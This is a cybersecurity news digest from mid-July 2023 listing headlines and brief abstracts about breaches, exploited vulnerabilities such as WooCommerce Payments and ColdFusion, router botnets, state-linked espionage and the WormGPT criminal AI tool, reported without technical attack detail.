July 18, 2023 – Breach
‘Millions of emails’ for US military sent to .ml addresses Full Text
Abstract
For the past decade, millions of emails destined for .mil US military addresses were actually directed at .ml addresses, that being the top-level domain for the African nation of Mali, it's claimed.Cyware
July 18, 2023 – Criminals
Cybercriminals Exploiting WooCommerce Payments Plugin Flaw to Hijack Websites Full Text
Abstract
Threat actors are actively exploiting a recently disclosed critical security flaw in the WooCommerce Payments WordPress plugin as part of a massive targeted campaign. The flaw, tracked as CVE-2023-28121 (CVSS score: 9.8), is a case of authentication bypass that enables unauthenticated attackers to impersonate arbitrary users and perform some actions as the impersonated user, including an administrator, potentially leading to site takeover. "Large-scale attacks against the vulnerability, assigned CVE-2023-28121, began on Thursday, July 14, 2023 and continued over the weekend, peaking at 1.3 million attacks against 157,000 sites on Saturday, July 16, 2023," Wordfence security researcher Ram Gall said in a Monday post. Versions 4.8.0 through 5.6.1 of WooCommerce Payments are vulnerable. The plugin is installed on over 600,000 sites. Patches for the bug were released by WooCommerce back in March 2023, with WordPress issuing auto-updates to sites using affected versions ofThe Hacker News
July 18, 2023 – General
Growing Scam Activity Linked to Social Media and Automation Full Text
Abstract
The average number of scam resources per brand across all regions and industries more than doubled year-on-year in 2022, up 162%, according to Group-IB. Additionally, the total number of scam pages detected in 2022 was more than three times that of 2021.Cyware
July 18, 2023 – Breach
JumpCloud Blames ‘Sophisticated Nation-State’ Actor for Security Breach Full Text
Abstract
A little over a week after JumpCloud reset API keys of customers impacted by a security incident, the company said the intrusion was the work of a sophisticated nation-state actor. The adversary "gained unauthorized access to our systems to target a small and specific set of our customers," Bob Phan, chief information security officer (CISO) at JumpCloud, said in a post-mortem report. "The attack vector used by the threat actor has been mitigated." The U.S. enterprise software firm said it identified anomalous activity on June 27, 2023, on an internal orchestration system, which it traced back to a spear-phishing campaign mounted by the attacker on June 22. While JumpCloud said it took security steps to shield its network by rotating credentials and rebuilding its systems, it wasn't until July 5 when it detected "unusual activity" in the commands framework for a small set of customers, prompting a forced-rotation of all admin API keys. The numThe Hacker News
July 18, 2023 – Breach
Dating App That Claims 50 Million Users Suffered a Data Breach Full Text
Abstract
Cybersecurity researcher Jeremiah Fowler discovered a non-password-protected database containing approximately 2.3 million records associated with multiple dating applications.Cyware
July 17, 2023 – Phishing
Meta’s Threads App Used as a Lure Full Text
Abstract
Researchers with Veriti are warning about “over 700 domains related to Threads being registered daily” in recent weeks, offering an Android version of the app for download outside of Google’s official app store.Cyware
July 17, 2023 – Phishing
Hackers Exploit WebAPK to Deceive Android Users into Installing Malicious Apps Full Text
Abstract
Threat actors are taking advantage of Android's WebAPK technology to trick unsuspecting users into installing malicious web apps on Android phones that are designed to capture sensitive personal information. "The attack began with victims receiving SMS messages suggesting the need to update a mobile banking application," researchers from CSIRT KNF said in an analysis released last week. "The link contained in the message led to a site that used WebAPK technology to install a malicious application on the victim's device." The application impersonates PKO Bank Polski, a multinational banking and financial services company headquartered in Warsaw. Details of the campaign were first shared by Polish cybersecurity firm RIFFSEC. WebAPK allows users to install progressive web apps (PWAs) to their home screen on Android devices without having to use the Google Play Store. "When a user installs a PWA from Google Chrome and a WebAPK is used, the mintiThe Hacker News
July 17, 2023 – Vulnerabilities
Adobe warns customers of a critical ColdFusion RCE exploited in attacks Full Text
Abstract
Adobe is warning customers of a critical ColdFusion pre-authentication RCE bug, tracked as CVE-2023-29300, which is actively exploited. Adobe warns customers of a critical ColdFusion pre-authentication remote code execution vulnerability, tracked...Security Affairs
July 17, 2023 – Vulnerabilities
Exploitation of ColdFusion Vulnerability Reported as Adobe Patches Another Critical Flaw Full Text
Abstract
Tracked as CVE-2023-38203 (CVSS score of 9.8), the flaw is described as “deserialization of untrusted data” in ColdFusion versions 2023, 2021, and 2018. This allows an attacker to use specially crafted data to trigger the execution of arbitrary code.Cyware
July 17, 2023 – Solution
These 6 Questions Will Help You Choose the Best Attack Surface Management Platform Full Text
Abstract
The hype around different security categories can make it difficult to discern features and capabilities from bias when researching new platforms. You want to advance your security measures, but what steps actually make sense for your business? For anyone ready to find an attack surface management (ASM) vendor , review these six questions before getting started to understand the key features to look for in an ASM platform and the qualities of the vendor who supports it. Refer to these as your quick guide for interviewing vendors to walk away with the most suitable ASM platform for your needs. Checklist: 6 Questions to Ask Attack Surface Management Vendors Does your platform have the capability to discover the unknown? How do you prevent alert fatigue, prioritize alerts and remove false positives? Can you track attack surface changes over time? How do you plan to evolve the platform going forward? What services related to ASM do you offer? Can we demo or test run the plThe Hacker News
July 17, 2023 – Criminals
Admins of Genesis Market marketplace sold their infrastructure on a hacker forum Full Text
Abstract
The admins of the darkweb Genesis Market announced the sale of their platform to a threat actor that will restart operations next month. In April, the FBI seized the Genesis Market, a black marketplace for stolen credentials that was launched in 2017....Security Affairs
July 17, 2023 – Malware
Update: Google Removes Swing VPN Android App Exposed as DDoS Botnet Full Text
Abstract
The incident serves as a reminder that even seemingly legitimate apps can harbor dangerous intentions, highlighting the importance of staying informed and vigilant against cyber threats.Cyware
July 17, 2023 – General
Malicious USB Drives Targeting Global Targets with SOGU and SNOWYDRIVE Malware Full Text
Abstract
Cyber attacks using infected USB drives as an initial access vector have witnessed a three-fold increase in the first half of 2023. That's according to new findings from Mandiant, which detailed two such campaigns – SOGU and SNOWYDRIVE – targeting both public and private sector entities across the world. SOGU is the "most prevalent USB-based cyber espionage attack using USB flash drives and one of the most aggressive cyber espionage campaigns targeting both public and private sector organizations globally across industry verticals," the Google-owned threat intelligence firm said . The activity has been attributed to a China-based cluster called TEMP.Hex, which is also tracked under the names Camaro Dragon, Earth Preta, and Mustang Panda. Targets include construction and engineering, business services, government, health, transportation, and retail in Europe, Asia, and the U.S. The infection chain detailed by Mandiant exhibits tactical commonalities withThe Hacker News
July 17, 2023 – Attack
Hackers Target Pakistani Government, Bank, and Telecom Provider With China-Made Malware Full Text
Abstract
Cybersecurity firm Trend Micro identified three entities in Pakistan targeted by Shadowpad last year: an unnamed government agency, a state bank, and a telecommunications provider.Cyware
July 17, 2023 – Criminals
Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware Full Text
Abstract
Microsoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called LokiBot on compromised systems. "LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015," Fortinet FortiGuard Labs researcher Cara Lin said . "It primarily targets Windows systems and aims to gather sensitive information from infected machines." The cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of CVE-2021-40444 and CVE-2022-30190 (aka Follina) to achieve code execution. The Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot. The injector also features evasion techniques to check for the presence of debuggers aThe Hacker News
July 17, 2023 – Breach
Global Data Breach Could Impact 70,000 Residents, Vendor Employees With Hillsborough County Full Text
Abstract
Hillsborough County said they've mailed notification letters to 70,636 people who are clients of Healthcare services and vendors of aging services who they know were impacted.Cyware
July 17, 2023
Russia-Linked Gamaredon APT Starts Stealing Data From Victims Between 30 and 50 Minutes After the Initial Compromise Full Text
Abstract
The Russia-linked APT group employs spear-phishing emails and messages, such as on Telegram and Signal, to trick victims into opening malicious attachments. Gamaredon uses malware and PowerShell scripts for reconnaissance and executing commands.Cyware
July 17, 2023 – Malware
New AVrecon Malware Infects 70,000 Linux Routers Across 20 Countries Full Text
Abstract
A stealthy Linux malware, dubbed AVrecon, was found targeting more than 70,000 Linux-based SOHO routers at least since May 2021. It reportedly hijacked these devices to form a botnet that could steal bandwidth and provide a hidden residential proxy service. A total of 15 second-stage control server ...Cyware
July 17, 2023 – Attack
Hackers Target Reddit Alternative Lemmy via Zero-Day Vulnerability Full Text
Abstract
A few days ago, an attacker leveraged a cross-site scripting (XSS) vulnerability to deface pages on some popular instances, including Lemmy.world, the most popular instance, which has over 100,000 users.Cyware
July 17, 2023 – Hacker
CERT-UA Uncovers Gamaredon’s Rapid Data Exfiltration Tactics Following Initial Compromise Full Text
Abstract
The Russia-linked threat actor known as Gamaredon has been observed conducting data exfiltration activities within an hour of the initial compromise. "As a vector of primary compromise, for the most part, emails and messages in messengers (Telegram, WhatsApp, Signal) are used, in most cases, using previously compromised accounts," the Computer Emergency Response Team of Ukraine (CERT-UA) said in an analysis of the group published last week. Gamaredon , also called Aqua Blizzard, Armageddon, Shuckworm, or UAC-0010, is a state-sponsored actor with ties to the SBU Main Office in the Autonomous Republic of Crimea, which was annexed by Russia in 2014. The group is estimated to have infected thousands of government computers. It is also one of the many Russian hacking crews that have maintained an active presence since the start of the Russo-Ukrainian war in February 2022, leveraging phishing campaigns to deliver PowerShell backdoors such as GammaSteel to conduct reconThe Hacker News
July 17, 2023 – Vulnerabilities
Cisco fixed a critical flaw in SD-WAN vManage Full Text
Abstract
Cisco warns of a critical unauthenticated REST API access vulnerability, tracked as CVE-2023-20214, impacting its SD-WAN vManage. Cisco addressed a critical unauthenticated REST API access vulnerability, tracked as CVE-2023-20214 (CVSS Score 9.1),...Security Affairs
July 17, 2023 – Government
FCC Chair Proposes $200M Investment to Boost K-12 Cybersecurity Full Text
Abstract
The move follows urgent calls for the FCC to update its E-rate program to cover advanced firewalls and other network security measures. The pilot program is part of FCC Chairwoman Jessica Rosenworcel’s Learn Without Limits initiative.Cyware
July 17, 2023 – Policy and Law
Pompompurin, the BreachForums owner, pleads guilty to hacking charges and possession of child pornography Full Text
Abstract
The owner of the BreachForums Conor Brian Fitzpatrick, aka Pompompurin, pleads guilty to hacking charges. The owner of the BreachForums Conor Brian Fitzpatrick agrees to plead guilty to a three-count criminal information charging the defendant with...Security Affairs
July 16, 2023 – Malware
WormGPT, the generative AI tool to launch sophisticated BEC attacks Full Text
Abstract
The WormGPT case: How generative artificial intelligence (AI) can improve the capabilities of cybercriminals and allow them to launch sophisticated attacks. Researchers from SlashNext warn of the dangers related to a new generative AI cybercrime...Security Affairs
July 15, 2023 – Criminals
WormGPT: New AI Tool Allows Cybercriminals to Launch Sophisticated Cyber Attacks Full Text
Abstract
With generative artificial intelligence (AI) becoming all the rage these days, it's perhaps not surprising that the technology has been repurposed by malicious actors to their own advantage, enabling avenues for accelerated cybercrime. According to findings from SlashNext, a new generative AI cybercrime tool called WormGPT has been advertised on underground forums as a way for adversaries to launch sophisticated phishing and business email compromise ( BEC ) attacks. "This tool presents itself as a blackhat alternative to GPT models, designed specifically for malicious activities," security researcher Daniel Kelley said . "Cybercriminals can use such technology to automate the creation of highly convincing fake emails, personalized to the recipient, thus increasing the chances of success for the attack." The author of the software has described it as the "biggest enemy of the well-known ChatGPT" that "lets you do all sorts of illegal stuff.The Hacker News
July 15, 2023 – General
USB Flash Drives for Malware Attack Surges Full Text
Abstract
Mandiant experts have observed a significant rise in malware attacks aimed at stealing sensitive information through the use of USB drives. The attacks targeted a variety of industries including those in construction, engineering, government, manufacturing, retail, media, and pharmaceutical. Organi ...Cyware
July 15, 2023 – Breach
Microsoft Bug Allowed Hackers to Breach Over Two Dozen Organizations via Forged Azure AD Tokens Full Text
Abstract
Microsoft on Friday said a validation error in its source code allowed for Azure Active Directory (Azure AD) tokens to be forged by a malicious actor known as Storm-0558 using a Microsoft account (MSA) consumer signing key to breach two dozen organizations. "Storm-0558 acquired an inactive MSA consumer signing key and used it to forge authentication tokens for Azure AD enterprise and MSA consumer to access OWA and Outlook.com," the tech giant said in a deeper analysis of the campaign. "The method by which the actor acquired the key is a matter of ongoing investigation." "Though the key was intended only for MSA accounts, a validation issue allowed this key to be trusted for signing Azure AD tokens. This issue has been corrected." It's not immediately clear if the token validation issue was exploited as a "zero-day vulnerability" or if Microsoft was already aware of the problem before it came under in-the-wild abuse. The attacks singlThe Hacker News
July 15, 2023 – Malware
Meet CustomerLoader: A Multifaceted Malware Unleashing Diverse Payloads Full Text
Abstract
An unreported .NET loader referred to as CustomerLoader is being distributed through deceptive phishing emails, YouTube videos, and web pages that mimicked genuine websites. This loader possesses the capability to retrieve, decrypt, and execute additional payloads.Cyware
July 15, 2023 – General
Security Affairs newsletter Round 428 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Russia-linked...Security Affairs
July 15, 2023 – General
Satellites lack standard security mechanisms found in mobile phones and laptops Full Text
Abstract
Researchers from Ruhr University Bochum and the CISPA Helmholtz Center for Information Security in Saarbrücken have assessed the security mechanisms of satellites currently orbiting the Earth from an IT perspective.Cyware
July 15, 2023
Russia-linked APT Gamaredon starts stealing data from victims between 30 and 50 minutes after the initial compromise Full Text
Abstract
Ukraine's Computer Emergency Response Team (CERT-UA) states that Russia-linked APT Gamaredon starts stealing data 30 minutes after the initial compromise. Ukraine's Computer Emergency Response Team (CERT-UA) is warning that the Russia-linked APT group...Security Affairs
July 15, 2023 – Privacy
Three Tax Prep Firms Shared ‘Extraordinarily Sensitive’ Data About Taxpayers With Meta, Lawmakers Say Full Text
Abstract
A group of congressional Democrats reported that three large tax preparation firms sent “extraordinarily sensitive” information on tens of millions of taxpayers to Facebook parent company Meta over the course of at least two years.Cyware
July 14, 2023 – Vulnerabilities
Popular WordPress Security Plugin Caught Logging Plaintext Passwords Full Text
Abstract
It was discovered that AIOS version 5.1.9 writes plaintext passwords from login attempts to the database, which essentially provides any privileged user with access to the login credentials of all other administrator users.Cyware
July 14, 2023 – Vulnerabilities
Critical Security Flaws Uncovered in Honeywell Experion DCS and QuickBlox Services Full Text
Abstract
Multiple security vulnerabilities have been discovered in various services, including Honeywell Experion distributed control system (DCS) and QuickBlox, that, if successfully exploited, could result in severe compromise of affected systems. Dubbed Crit.IX, the nine flaws in the Honeywell Experion DCS platform allow for "unauthorized remote code execution, which means an attacker would have the power to take over the devices and alter the operation of the DCS controller, whilst also hiding the alterations from the engineering workstation that manages the controller," Armis said in a statement shared with The Hacker News. Put differently, the issues relate to lack of encryption and adequate authentication mechanisms in a proprietary protocol called Control Data Access (CDA) that's used to communicate between Experion Servers and C300 controllers, effectively enabling a threat actor to take over the devices and alter the operation of the DCS controller. "As aThe Hacker News
July 14, 2023 – Breach
The source code of the BlackLotus UEFI Bootkit was leaked on GitHub Full Text
Abstract
The source code for the BlackLotus UEFI bootkit has been published on GitHub and experts warn of the risks of proliferation of custom versions. Researchers from ESET discovered in March a new stealthy Unified Extensible Firmware Interface (UEFI) bootkit,...Security Affairs
July 14, 2023 – Breach
BlackLotus UEFI Bootkit Source Code Leaked on GitHub Full Text
Abstract
The BlackLotus source code that was published on GitHub on Wednesday has been stripped of the ‘Baton Drop’ exploit targeting CVE-2022-21894, and uses the bootlicker UEFI firmware rootkit, but contains the rest of the original code.Cyware
July 14, 2023 – Insider Threat
Defend Against Insider Threats: Join this Webinar on SaaS Security Posture Management Full Text
Abstract
As security practices continue to evolve, one primary concern persists in the minds of security professionals—the risk of employees unintentionally or deliberately exposing vital information. Insider threats, whether originating from deliberate actions or accidental incidents, pose a significant challenge to safeguarding sensitive data. To effectively address insider risks, organizations must adopt a holistic approach that encompasses technical, procedural, and human elements. While access controls, encryption, and monitoring systems are crucial for identifying and mitigating unauthorized access and suspicious activities, the increasing prevalence of cloud-based environments and the surge in SaaS application usage demand a fresh perspective on Insider Risk Management from a SaaS security standpoint. Stay ahead of the game by embracing the SaaS security lens. Join us for an enlightening webinar where we will demonstrate how security practitioners can proactively adapt their approachThe Hacker News
July 14, 2023 – Government
US CISA warns of Rockwell Automation ControlLogix flaws Full Text
Abstract
The U.S. CISA warns of two flaws impacting Rockwell Automation ControlLogix that can lead to remote code execution and DoS attacks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of two vulnerabilities affecting Rockwell...Security Affairs
July 14, 2023 – Government
CISA Gives US Civilian Agencies Until August 1 to Resolve Four Microsoft Vulnerabilities Full Text
Abstract
The inclusion of the four vulnerabilities — CVE-2023-32046, CVE-2023-32049, CVE-2023-35311, and CVE-2023-36874 — into CISA’s catalog means the bugs are already being exploited by hackers.Cyware
July 14, 2023 – Insider Threat
AIOS WordPress Plugin Faces Backlash for Storing User Passwords in Plain Text Full Text
Abstract
All-In-One Security (AIOS), a WordPress plugin installed on over one million sites, has issued a security update after a bug introduced in version 5.1.9 of the software caused users' passwords to be added to the database in plaintext format. "A malicious site administrator (i.e. a user already logged into the site as an admin) could then have read them," UpdraftPlus, the maintainers of AIOS, said . "This would be a problem if those site administrators were to try out those passwords on other services where your users might have used the same password. If those other services' logins are not protected by two-factor authentication, this could be a risk to the affected website." The issue surfaced nearly three weeks ago when a user of the plugin reported the behavior, stating they were "absolutely shocked that a security plugin is making such a basic security 101 error." AIOS also noted that the updates remove the existing logged data from thThe Hacker News
July 14, 2023 – Vulnerabilities
Indexing Over 15 Million WordPress Websites with PWNPress Full Text
Abstract
Sicuranex's PWNPress platform has indexed over 15 million WordPress websites; it collects data related to vulnerabilities and misconfigurations. Leveraging the extensive Common Crawl dataset and pushing the boundaries of data analysis, cybersecurity firm...Security Affairs
July 14, 2023 – Business
Secure Code Warrior Lands $50M to Educate Developers on Best Cyber Practices Full Text
Abstract
With a recent $50 million Series C funding round led by Paladin Capital Group, Secure Code Warrior plans to improve its platform and expand its workforce to meet the growing demand for cybersecurity skills training.Cyware
July 14, 2023 – Attack
TeamTNT’s Cloud Credential Stealing Campaign Now Targets Azure and Google Cloud Full Text
Abstract
A malicious actor has been linked to a cloud credential stealing campaign in June 2023 that's focused on Azure and Google Cloud Platform (GCP) services, marking the adversary's expansion in targeting beyond Amazon Web Services (AWS). The findings come from SentinelOne and Permiso , which said the "campaigns share similarity with tools attributed to the notorious TeamTNT cryptojacking crew," although it emphasized that "attribution remains challenging with script-based tools." They also overlap with an ongoing TeamTNT campaign disclosed by Aqua called Silentbob that leverages misconfigured cloud services to drop malware as part of what's said to be a testing effort, while also linking SCARLETEEL attacks to the threat actor, citing infrastructure commonalities. "TeamTNT is scanning for credentials across multiple cloud environments, including AWS, Azure, and GCP," Aqua noted. The attacks, which single out public-facing Docker instancThe Hacker News
July 14, 2023 – Botnet
New AVrecon botnet remained under the radar for two years while targeting SOHO Routers Full Text
Abstract
A new malware dubbed AVrecon targets small office/home office (SOHO) routers; it has infected over 70,000 devices across 20 countries. Lumen Black Lotus Labs uncovered a long-running hacking campaign targeting SOHO routers with a strain of malware dubbed AVrecon. The...Security Affairs
July 14, 2023 – Vulnerabilities
Hardcoded Accounts Allow Full Takeover of Technicolor Routers Full Text
Abstract
Multiple hardcoded credentials found on the Technicolor TG670 DSL gateway router allow attackers to completely take over devices, the CERT Coordination Center (CERT/CC) warns.Cyware
July 14, 2023 – Malware
New SOHO Router Botnet AVrecon Spreads to 70,000 Devices Across 20 Countries Full Text
Abstract
A new malware strain has been found covertly targeting small office/home office (SOHO) routers for more than two years, infiltrating over 70,000 devices and creating a botnet with 40,000 nodes spanning 20 countries. Lumen Black Lotus Labs has dubbed the malware AVrecon , making it the third such strain to focus on SOHO routers after ZuoRAT and HiatusRAT over the past year. "This makes AVrecon one of the largest SOHO router-targeting botnets ever seen," the company said . "The purpose of the campaign appears to be the creation of a covert network to quietly enable a range of criminal activities from password spraying to digital advertising fraud." A majority of the infections are located in the U.K. and the U.S., followed by Argentina, Nigeria, Brazil, Italy, Bangladesh, Vietnam, India, Russia, and South Africa, among others. AVrecon was first highlighted by Kaspersky senior security researcher Ye (Seth) Jin in May 2021, indicating that the malware hasThe Hacker News
July 14, 2023 – Attack
Norwegian Refugee Council hit by cyberattack Full Text
Abstract
The NRC said it immediately suspended the database to protect the data and prevent further attacks. They also launched an external forensic investigation to determine the scope and impact of the cyberattack.Cyware
July 14, 2023 – Vulnerabilities
Zimbra Warns of Critical Zero-Day Flaw in Email Software Amid Active Exploitation Full Text
Abstract
Zimbra has warned of a critical zero-day security flaw in its email software that has come under active exploitation in the wild. "A security vulnerability in Zimbra Collaboration Suite Version 8.8.15 that could potentially impact the confidentiality and integrity of your data has surfaced," the company said in an advisory. It also said that the issue has been addressed and that it's expected to be delivered in the July patch release. Additional details about the flaw are currently unavailable. In the interim, it is urging customers to apply a manual fix to eliminate the attack vector: take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto; edit this file and go to line number 40; update the parameter value as: Before the update, the line appeared as: WhiThe Hacker News
July 13, 2023 – Vulnerabilities
Juniper Networks Patches High-Severity Vulnerabilities in Junos OS Full Text
Abstract
The company published 17 advisories detailing roughly a dozen Junos OS-specific security defects, and nearly three times as many issues in third-party components used in its products.Cyware
July 13, 2023 – Malware
PicassoLoader Malware Used in Ongoing Attacks on Ukraine and Poland Full Text
Abstract
Government entities, military organizations, and civilian users in Ukraine and Poland have been targeted as part of a series of campaigns designed to steal sensitive data and gain persistent remote access to the infected systems. The intrusion set, which stretches from April 2022 to July 2023, leverages phishing lures and decoy documents to deploy a downloader malware called PicassoLoader, which acts as a conduit to launch Cobalt Strike Beacon and njRAT. "The attacks used a multistage infection chain initiated with malicious Microsoft Office documents, most commonly using Microsoft Excel and PowerPoint file formats," Cisco Talos researcher Vanja Svajcer said in a new report. "This was followed by an executable downloader and payload concealed in an image file, likely to make its detection more difficult." Some of the activities have been attributed to a threat actor called GhostWriter (aka UAC-0057 or UNC1151), whose priorities are said to align with the BeThe Hacker News
July 13, 2023 – Vulnerabilities
Apple re-released Rapid Security Response to fix recently disclosed zero-day Full Text
Abstract
Apple re-released its Rapid Security Response updates for iOS and macOS after fixing browsing issues on certain websites caused by the first RSR. Apple has re-released its Rapid Security Response updates to address the CVE-2023-37450 flaw in iOS and macOS...Security Affairs
July 13, 2023 – Attack
Tampa Bay Zoo Targeted in Cyberattack by Apparent Offshoot of Royal Ransomware Full Text
Abstract
One of the U.S.’s most popular zoos has been hit with a cyberattack involving the theft of employee and vendor information, and a likely offshoot of the Royal ransomware gang is taking credit.Cyware
July 13, 2023 – Botnet
TeamTNT’s Silentbob Botnet Infecting 196 Hosts in Cloud Attack Campaign Full Text
Abstract
As many as 196 hosts have been infected as part of an aggressive cloud campaign mounted by the TeamTNT group called Silentbob . "The botnet run by TeamTNT has set its sights on Docker and Kubernetes environments, Redis servers, Postgres databases, Hadoop clusters, Tomcat and Nginx servers, Weave Scope, SSH, and Jupyter applications," Aqua security researchers Ofek Itach and Assaf Morag said in a report shared with The Hacker News. "The focus this time seems to be more on infecting systems and testing the botnet, rather than deploying cryptominers for profit." The development arrives a week after the cloud security company detailed an intrusion set linked to the TeamTNT group that targets exposed JupyterLab and Docker APIs to deploy the Tsunami malware and hijack system resources to run a cryptocurrency miner. The latest findings suggest a broader campaign and the use of a larger attack infrastructure than previously thought, including various shell scriptThe Hacker News
July 13, 2023 – Vulnerabilities
Zimbra urges customers to manually fix actively exploited zero-day reported by Google TAG Full Text
Abstract
Zimbra has released updates to address a zero-day vulnerability actively exploited in attacks aimed at Zimbra Collaboration Suite (ZCS) email servers. Zimbra urges customers to manually install updates to fix a zero-day vulnerability that is actively...Security Affairs
July 13, 2023 – Criminals
Criminals Target Businesses With Malicious Extension for Meta’s Ads Manager and Accidentally Leak Stolen Accounts Full Text
Abstract
The Vietnamese threat actors are using malicious Chrome extensions to steal Facebook account credentials, with over 800 victims worldwide and $180K in compromised ad budget.Cyware
July 13, 2023 – Vulnerabilities
Fake PoC for Linux Kernel Vulnerability on GitHub Exposes Researchers to Malware Full Text
Abstract
In a sign that cybersecurity researchers continue to be under the radar of malicious actors, a proof-of-concept (PoC) has been discovered on GitHub, concealing a backdoor with a "crafty" persistence method. "In this instance, the PoC is a wolf in sheep's clothing, harboring malicious intent under the guise of a harmless learning tool," Uptycs researchers Nischay Hegde and Siddartha Malladi said. "Operating as a downloader, it silently dumps and executes a Linux bash script, all the while disguising its operations as a kernel-level process." The repository masquerades as a PoC for CVE-2023-35829, a recently disclosed high-severity flaw in the Linux kernel. It has since been taken down, but not before it was forked 25 times. Another PoC shared by the same account, ChriSanders22, for CVE-2023-20871, a privilege escalation bug impacting VMware Fusion, was forked twice. Uptycs also identified a second GitHub profile containing a bogus PoC fThe Hacker News
July 13, 2023 – Breach
Chinese hackers compromised emails of U.S. Government agencies Full Text
Abstract
Chinese hackers have compromised the emails of an unnamed US Federal Civilian Executive Branch (FCEB) agency. In mid-June, malicious email activity was reported by the unnamed US Federal Civilian Executive Branch (FCEB) agency. Microsoft experts who investigated...Security Affairs
July 13, 2023 – General
Ransomware Crypto Payments Poised to Set New Record in 2023 Full Text
Abstract
While overall crypto proceeds, including from crimes such as scams, fell dramatically over the past year, ransomware funds are expected to hit $899 million in 2023, according to Chainalysis.Cyware
July 13, 2023 – Vulnerabilities
Rockwell Automation ControlLogix Bugs Expose Industrial Systems to Remote Attacks Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has warned of two security flaws impacting Rockwell Automation ControlLogix EtherNet/IP (ENIP) communication module models that could be exploited to achieve remote code execution and denial-of-service (DoS). "The results and impact of exploiting these vulnerabilities vary depending on the ControlLogix system configuration, but they could lead to denial or loss of control, denial or loss of view, theft of operational data, or manipulation of control for disruptive or destructive consequences on the industrial process for which the ControlLogix system is responsible," Dragos said. The list of flaws is as follows - CVE-2023-3595 (CVSS score: 9.8) - An out-of-bounds write flaw impacting 1756 EN2* and 1756 EN3* products that could result in arbitrary code execution with persistence on the target system through maliciously crafted Common Industrial Protocol (CIP) messages. CVE-2023-3596 (CVSS score: 7.5The Hacker News
July 13, 2023 – Vulnerabilities
SonicWall urges organizations to fix critical flaws in GMS/Analytics products Full Text
Abstract
SonicWall fixed multiple critical vulnerabilities impacting its GMS firewall management and Analytics management and reporting engine. SonicWall addressed multiple critical vulnerabilities in its Global Management System (GMS) firewall management...Security Affairs
July 13, 2023 – Vulnerabilities
APT Exploit Targeting Rockwell Automation Flaws Threatens Critical Infrastructure Full Text
Abstract
The 1756 EN2 and 1756 EN3 products are impacted by CVE-2023-3595, a critical flaw that can allow attackers to achieve remote code execution with persistence on targeted systems by using specially crafted Common Industrial Protocol (CIP) messages.Cyware
July 13, 2023 – Breach
U.S. Government Agencies’ Emails Compromised in China-Backed Cyber Attack Full Text
Abstract
An unnamed Federal Civilian Executive Branch (FCEB) agency in the U.S. detected anomalous email activity in mid-June 2023, leading to Microsoft's discovery of a new China-linked espionage campaign targeting two dozen organizations. The details come from a joint cybersecurity advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) on July 12, 2023. "In June 2023, a Federal Civilian Executive Branch (FCEB) agency identified suspicious activity in their Microsoft 365 (M365) cloud environment," the authorities said. "Microsoft determined that advanced persistent threat (APT) actors accessed and exfiltrated unclassified Exchange Online Outlook data." While the name of the government agency was not revealed, CNN and the Washington Post reported it was the U.S. State Department, citing people familiar with the matter. Also targeted were the Commerce Department as well as the email accouThe Hacker News
July 13, 2023 – Attack
Unpatched Office Zero-Day CVE-2023-36884 Actively Exploited in Targeted Attacks Full Text
Abstract
“An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim," reads the advisory published by Microsoft.Cyware
July 13, 2023 – Vulnerabilities
New Vulnerabilities Disclosed in SonicWall and Fortinet Network Security Products Full Text
Abstract
SonicWall on Wednesday urged customers of Global Management System (GMS) firewall management and Analytics network reporting engine software to apply the latest fixes to secure against a set of 15 security flaws that could be exploited by a threat actor to circumvent authentication and access sensitive information. Of the 15 shortcomings (tracked from CVE-2023-34123 through CVE-2023-34137), four are rated Critical, four are rated High, and seven are rated Medium in severity. The vulnerabilities were disclosed by NCC Group. The flaws impact on-premise versions of GMS 9.3.2-SP1 and before and Analytics 2.5.0.4-R7 and before. Fixes are available in versions GMS 9.3.3 and Analytics 2.5.2. "The suite of vulnerabilities allows an attacker to view data that they are not normally able to retrieve," SonicWall said. "This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or deleThe Hacker News
July 13, 2023 – Encryption
Only 45% of Cloud Data is Currently Encrypted Full Text
Abstract
About 39% of businesses experienced a data breach in their cloud environment last year, an increase from the 35% reported in 2022, according to Thales. Human error was reported as the leading cause of cloud data breaches by 55% of those surveyed.Cyware
July 13, 2023 – Malware
New Attack Drops LokiBot Malware via Malicious Macros in Word Documents Full Text
Abstract
FortiGuard Labs recently uncovered a series of malicious Microsoft Office documents designed to exploit well-known vulnerabilities.Cyware
July 13, 2023 – Policy and Law
Silk Road Drug Market’s ‘Mentor’ Sentenced to 20 Years in Prison Full Text
Abstract
During its operation from 2011 until 2013, Silk Road was used by thousands of drug dealers to distribute narcotics and other illicit goods and services to more than 100,000 buyers and to launder hundreds of millions from those unlawful transactions.Cyware
July 12, 2023 – Policy and Law
British Prosecutors Say Teen Lapsus$ Member Was Behind Hacks on Uber, Rockstar Full Text
Abstract
A British Crown Court on Tuesday lifted a reporting restriction, allowing the naming of teenager Arion Kurtaj who is accused of hacking Uber, Revolut, and video game developer Rockstar Games in a short period of time last September.Cyware
July 12, 2023 – General
Ransomware Extortion Skyrockets in 2023, Reaching $449.1 Million and Counting Full Text
Abstract
Ransomware has emerged as the only cryptocurrency-based crime to grow in 2023, with cybercriminals extorting nearly $175.8 million more than they did a year ago, according to findings from Chainalysis. "Ransomware attackers are on pace for their second-biggest year ever, having extorted at least $449.1 million through June," the blockchain analytics firm said in a midyear crypto crime report shared with The Hacker News. "If this pace continues, ransomware attackers will extort $898.6 million from victims in 2023, trailing only 2021's $939.9 million." In contrast, crypto scams have pulled in 77% less revenue than they did through June of 2022, largely driven by the abrupt exit of VidiLook, which pays users VDL tokens in return for watching digital ads that then can be exchanged for large rewards. So have the inflows to illicit addresses associated with malware, darknet markets, child abuse material, and fraud shops. The development, following a declineThe Hacker News
